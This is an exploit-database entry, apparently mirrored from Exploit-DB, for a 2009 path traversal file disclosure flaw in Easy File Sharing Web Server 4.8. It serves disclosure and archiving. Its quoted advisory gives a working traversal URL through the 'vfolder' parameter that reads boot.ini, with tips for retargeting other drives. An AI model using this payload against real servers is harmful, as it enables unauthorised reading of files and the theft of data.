header-logo
Suggest Exploit
vendor:
Easy File Sharing Web Server
by:
Mountassif Moad
7.5
CVSS
HIGH
File Disclosure Vulnerability
22
CWE
Product Name: Easy File Sharing Web Server
Affected Version From: 4.8
Affected Version To: 4.8
Patch Exists: YES
Related CWE: N/A
CPE: a:ezbsystems:easy_file_sharing_web_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP 2
2009

Easy File Sharing Web Server File Disclouse Vulnerability

A vulnerability exists in Easy File Sharing Web Server 4.8 which allows an attacker to view the contents of any file on the server. This is done by sending a specially crafted HTTP request to the server. The request contains a parameter 'vfolder' which is used to specify the file to be viewed. By using a relative path, an attacker can view any file on the server.

Mitigation:

Upgrade to the latest version of Easy File Sharing Web Server.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Easy File Sharing Web Server File Disclouse Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Program:  Easy File Sharing Web Server
Version:  4.8
Download: http://www.sharing-file.com/efssetup.exe
Found by Mountassif Moad
www.v4-team.com

-- Bug --
Exploit :

http://127.0.0.1/disk_c/thumbnail.ghp?vfolder=../../.././/./../../boot.ini
if you have a hard disk like d or f you change disk_c by disk_d or disk_f some host dont have this
and if dont work in first test try to register and test another time
Tested on win xp SP 2 fr

# milw0rm.com [2009-03-04]

Navigation

Suggest Exploit

Services By CQR